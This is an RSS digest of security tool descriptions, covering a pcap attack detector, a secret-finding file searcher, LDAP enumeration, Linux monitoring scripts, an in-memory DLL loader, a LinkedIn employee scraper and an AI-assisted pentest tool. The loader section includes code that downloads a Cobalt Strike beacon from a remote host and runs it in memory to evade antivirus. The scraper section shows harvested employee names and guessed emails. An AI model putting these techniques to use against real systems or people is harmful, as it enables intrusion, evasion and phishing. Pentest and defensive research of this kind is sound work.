FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Network_Assessment - With Wireshark Or TCPdump, You Can Determine Whether There Is Harmful Activity On Your Network Traffic That You Have Recorded On The Network You Monitor

By: Zion3R


With Wireshark or TCPdump, you can determine whether there is harmful activity on your network traffic that you have recorded on the network you monitor.

This Python script analyzes network traffic in a given .pcap file and attempts to detect the following suspicious network activities and attacks:

  1. DNS Tunneling
  2. SSH Tunneling
  3. TCP Session Hijacking
  4. SMB Attack
  5. SMTP or DNS Attack
  6. IPv6 Fragmentation Attack
  7. TCP RST Attack
  8. SYN Flood Attack
  9. UDP Flood Attack
  10. Slowloris Attack

The script also tries to detect packages containing suspicious keywords (eg "password", "login", "admin", etc.). Detected suspicious activities and attacks are displayed to the user in the console.

The main functions are:

  • get_user_input(): Gets the path of the .pcap file from the user.
  • get_all_ip_addresses(capture): Returns a set containing all source and destination IP addresses.
  • detect_* functions: Used to detect specific attacks and suspicious activities.
  • main(): Performs the main operations of the script. First, it gets the path of the .pcap file from the user, and then analyzes the file to try to detect the specified attacks and suspicious activity.

How to Install Script?

git clone https://github.com/alperenugurlu/Network_Assessment.git

pip3 install -r requirements.txt

How to Run the Script?

python3 Network_Compromise_Assessment.py

Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap (Example)

Script Creator

Alperen Ugurlu

Social Media:

https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

Directory to search for gold -r RECURSIVE, --recursive RECURSIVE Search directory recursively? -l LOG, --log LOG Log file to save output" dir="auto">
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would provide the following command to parse all 3 account reports:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymously binded request, as well as checking for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • mplement command line options rather than inputs
  • Check for deprecated operating systems in the domain

Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.

Usage

Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name Script
Monitoring cron files monitor_cron.py
Monitoring /etc/hosts file monitor_hosts_file.py
Monitoring /etc/ld.so.preload file monitor_ld_preload.py
Monitoring /etc/passwd file monitor_passwd.py
Monitoring modules monitor_modules.py
Monitoring SSH authorized_keys files monitor_ssh_authorized_keys.py
Monitoring systemd unit files monitor_systemd_units.py
Search executables in /dev/shm search_dev_shm.py
Search fileless programs (memfd_create) search_memfd_create.py
Search hidden ELF files search_hidden_exe.py
Search immutable files search_immutable_files.py
Search kernel thread impersonations search_non_kthreads.py
Search processes that were started by a now disconnected SSH session search_ssh_leftover_processes.py
Search running deleted programs search_deleted_exe.py
Test script to check if alerting works test_alert.py
Verify integrity of installed .deb packages verify_deb_packages.py


PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

By: Zion3R


"Python memory module" AI generated pic - hotpot.ai


pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory

What is it

PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.

The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.


Why it can be useful

  1. It basically allows to use the MemoryModule techinque entirely in Python interpreted language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary without requiring dropping on disk external code/libraries (such as pymemorymodule bindings) that can be flagged by AV/EDRs or can raise user's suspicion.
  2. Using MemoryModule technique in compiled languages loaders would require to embed MemoryModule code within the loaders themselves. This can be avoided using Python interpreted language and PythonMemoryModule since the code can be executed dynamically and in memory.
  3. you can get some level of Intellectual Property protection by dynamically in-memory downloading, decrypting and loading dlls that should be hidden from prying eyes. Bear in mind that the dlls can be still recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
  4. you can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it and operating in memory.

How to use it

In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()

Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

How to detect it

Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.

Future improvements

  1. add support for argument parsing.
  2. add support (basic) for .NET assemblies execution.


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from LinkedIn API๏’ฌ

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.


Requirements

LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

 โ–ˆโ–ˆโ–“     โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ  โ–ˆโ–ˆ โ–„โ–ˆโ–€โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆ    โ–ˆโ–ˆ  โ–ˆโ–ˆโ–ˆโ–„ โ–„โ–ˆโ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–“โ–ˆโ–ˆโ–ˆ  โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ  โ–ˆโ–ˆโ–€โ–ˆโ–ˆโ–ˆ  
โ–“โ–ˆโ–ˆโ–’ โ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–ˆโ–ˆโ–„โ–ˆโ–’ โ–“โ–ˆ โ–€ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œโ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œ โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–’โ–€โ–ˆ& #9600; โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–“โ–ˆ โ–€ โ–“โ–ˆโ–ˆ โ–’ โ–ˆโ–ˆโ–’
โ–’โ–ˆโ–ˆโ–‘ โ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–ˆโ–„โ–‘ โ–’โ–ˆโ–ˆโ–ˆ โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–“โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–“โ–’โ–’โ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆ โ–‘โ–„โ–ˆ โ–’
โ–’โ–ˆโ–ˆโ–‘ โ–‘โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–ˆโ–„ โ–’โ–“โ–ˆ โ–„ โ–‘โ–“โ–ˆโ–„ โ–Œ&# 9617;โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆโ–„ โ–Œโ–“โ–“โ–ˆ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–„โ–ˆโ–“โ–’ โ–’โ–’โ–“โ–ˆ โ–„ โ–’โ–ˆโ–ˆโ–€โ–€โ–ˆโ–„
โ–‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–’ โ–ˆโ–„โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’ โ–‘โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–‘ โ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆ& #9618;โ–‘โ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’
โ–‘ โ–’โ–‘โ–“ โ–‘โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’ โ–’โ–’ โ–“โ–’โ–‘โ–‘ โ–’โ–‘ โ–‘ โ–’โ–’โ–“ โ–’ โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’โ–’โ–“ โ–’ โ–‘โ–’โ–“โ–’ โ–’ โ–’ โ–‘ โ–’โ–‘ โ–‘ โ–‘โ–’โ–“โ–’โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–’โ–‘ โ–‘โ–‘ โ–’โ–“ โ–‘โ–’โ–“โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘โ–‘ โ–‘โ–’ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–’ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘ โ–‘ โ–’ โ–’ โ–‘โ–‘โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–’ โ–‘ โ–’โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ by LRVT

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included to use ChatGPT session to support PentestGPT. You may also use GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed test in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from losses of context as test goes deeper. It is essential to maintain a "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentest. It may perform malicious operations. Due to this consideration, we design PentestGPT in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plan?
    • A: We're working on a paper to explore the tech details behind automated pentest. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy to medium HackTheBox machines, and other CTF challenges. You can check this example in resources where we use it to solve HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available at here.
  • A sample usage video is below: (or available here: Demo)

Installation

Before installation, we recommend you to take a look at this installation video if you want to use cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py.
    • If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header in the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (You may use Inspect->Network, find session and copy the cookie field in request_headers to https://chat.openai.com/api/auth/session)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process for cookie. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similar to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT intakes commands similar to chatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT to explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (and is for next line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use cursor or arrow key to navigate the list. Press ENTER to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.
  4. In the sub-task handler initiated by more, users can execute more commands to investigate into a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration testing, a report will be automatically generated in logs folder (if you quit with quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



โŒ